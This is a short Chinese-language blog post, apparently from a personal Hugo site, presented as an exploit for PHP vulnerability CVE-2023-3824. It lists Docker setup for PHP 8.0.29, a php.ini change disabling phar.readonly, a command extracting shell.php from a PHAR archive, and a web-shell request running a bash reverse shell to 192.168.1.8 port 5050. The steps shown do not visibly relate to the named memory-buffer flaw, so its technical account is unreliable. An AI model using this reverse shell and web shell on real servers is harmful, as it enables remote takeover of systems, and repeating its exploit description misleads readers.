PHP内存缓冲区操作限制不当漏洞利用分析(CVE-2023-3824)

本文详细分析了PHP中CVE-2023-3824漏洞的利用过程,该漏洞涉及内存缓冲区操作限制不当问题,CVSS评分高达9.8分。文章包含具体的Docker环境搭建、PHP配置修改和远程命令执行利用代码。

Exploit for Improper Restriction of Operations within the Bounds of a Memory Buffer in PHP CVE-2023-3824

2025-09-23 | CVSS 9.8

漏洞利用步骤

1
sudo docker run -it --rm -p 8080:80 php:8.0.29-apache bash
1
echo "phar.readonly = Off" >> /usr/local/etc/php/php.ini

利用代码

远程命令执行:

1
http://localhost:8080/shell.php?cmd=bash -c 'bash -i >%26 /dev/tcp/192.168.1.8/5050 0>%261'

PHAR文件提取:

1
php -r "\$phar = new Phar('exploit.phar'); \$phar->extractTo('./', 'shell.php');"

技术细节

该漏洞利用涉及以下关键技术点:

  • 使用Docker搭建PHP 8.0.29测试环境
  • 修改php.ini配置禁用phar.readonly设置
  • 通过PHAR文件提取机制执行恶意代码
  • 建立反向Shell连接实现远程命令执行
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计